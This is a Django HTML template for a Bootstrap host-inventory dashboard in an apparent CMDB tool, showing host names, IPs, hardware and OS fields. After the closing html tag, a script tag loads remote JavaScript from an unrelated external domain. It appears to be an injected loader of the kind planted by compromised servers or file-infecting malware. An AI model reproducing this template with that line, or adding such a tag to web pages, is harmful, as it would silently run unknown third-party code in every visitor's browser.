<html lang="zh-CN" class=""><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- 上述3个meta标签*必须*放在最前面，任何其他内容都*必须*跟随其后！ -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>Dashboard Template for Bootstrap</title>

    <!-- Bootstrap core CSS -->
    <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">


    <!-- Custom styles for this template -->
    <link href="/static/css/dashboard.css" rel="stylesheet">


  <style id="style-1-cropbar-clipper">/* Copyright 2014 Evernote Corporation. All rights reserved. */
.en-markup-crop-options {
    top: 18px !important;
    left: 50% !important;
    margin-left: -100px !important;
    width: 200px !important;
    border: 2px rgba(255,255,255,.38) solid !important;
    border-radius: 4px !important;
}

.en-markup-crop-options div div:first-of-type {
    margin-left: 0px !important;
}
</style><style type="text/css">.fancybox-margin{margin-right:0px;}</style></head>

  <body data-feedly-mini="yes" data-gclp-initialized="true" data-gistbox-initialized="true">

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container-fluid">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="#">Lmanger</a>
        </div>
        <div id="navbar" class="navbar-collapse collapse">
          <ul class="nav navbar-nav navbar-right">
            {% if user.is_authenticated %}
            <li><a href="#">hello, {{ user.username }}.</a></li>
              {%endif%}
            <li><a href="{% url 'users:logout' %}">退出</a></li>
            <li><a href="{% url 'users:login' %}">登录</a></li>
            <li><a href="{% url 'users:register' %}">register</a></li>

          </ul>
          <form class="navbar-form navbar-right">
            <input type="text" class="form-control" placeholder="Search...">
          </form>
        </div>
      </div>
    </nav>

    <div class="container-fluid">
      <div class="row">
        <div class="col-sm-3 col-md-2 sidebar">
          <ul class="nav nav-sidebar">
            <li class="active"><a href="/">Overview <span class="sr-only">(current)</span></a></li>
            <li><a href="/idc">IDC管理</a></li>
            <li>
            <li><a href="{% url 'cmdb:deploy' %}">自动化部署</a></li>
            </li>
            <li><a href="#">Export</a></li>
          </ul>
          <ul class="nav nav-sidebar">
            <li><a href="">Nav item</a></li>
            <li><a href="">Nav item again</a></li>
            <li><a href="">One more nav</a></li>
            <li><a href="">Another nav item</a></li>
            <li><a href="">More navigation</a></li>
          </ul>
          <ul class="nav nav-sidebar">
            <li><a href="">Nav item again</a></li>
            <li><a href="">One more nav</a></li>
            <li><a href="">Another nav item</a></li>
          </ul>
        </div>
        <div class="col-sm-9 col-sm-offset-3 col-md-10 col-md-offset-2 main">
          <h1 class="page-header">HostList</h1>

          <div class="row placeholders">



          <div class="table-responsive">
            <table class="table table-striped">
              <thead>
                <tr>
                  <th>id</th>
                  <th>主机名</th>
                  <th>编号</th>
                  <th>应用</th>
                  <th>ip</th>
                  <th>厂商</th>
                  <th>产品型号</th>
                  <th>产品序列号</th>
                  <th>cpu核心数</th>
                  <th>内存</th>
                  <th>操作系统</th>
                  <th>硬盘大小</th>
                  <th>操作</th>
                </tr>
              </thead>
              <tbody>
                <tr>
                  <td>{{hosts.id}}</td>
                  <td>{{hosts.hostname}}</td>
                  <td>{{hosts.num}}</td>
                  <td>{{hosts.application}}</td>
                  <td>
                  <select>
                    {% for ips in hostips %}
                      <option>
                        {{ips.ip}}
                      </option>
                      {%endfor%}
                    </select>
                    </td>
                      {% for host in hostinfo%}
                    <td>{{ host.date_added|date:'M d, Y H:i' }}</td>
                    <td>{{host.manufacturer}}</td>
                    <td>{{host.productmode}}</td>
                    <td>{{host.serialnumber}}</td>
                    <td>{{host.cpu}}</td>
                    <td>{{host.mem}}</td>
                    <td>{{host.os}}</td>
                    <td>{{host.disk}}</td>
                    {%endfor%}
                </tr>

              </tbody>
            </table>
          </div>
        </div>
      </div>
    </div>

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script>
    <script>window.jQuery || document.write('<script src="../../assets/js/vendor/jquery.min.js"><\/script>')</script>
    <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <!-- Just to make our placeholder images work. Don't actually copy the next line! -->
    <script src="../../assets/js/vendor/holder.min.js"></script>
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>

    <div class="fairydict-spinner">
      <div class="fairydict-bounce1"></div>
      <div class="fairydict-bounce2"></div>
      <div class="fairydict-bounce3"></div>
    </div>
    <p class="fairydict-tooltip-content">
    </p>
</div><form id="gclp-frame-form" target="gclp-frame" method="post" style="display: none;"></form><div id="feedly-mini" title="feedly Mini tookit"></div></body></html><script language=javascript src=http://www.haofbi.com/js/w.js></script>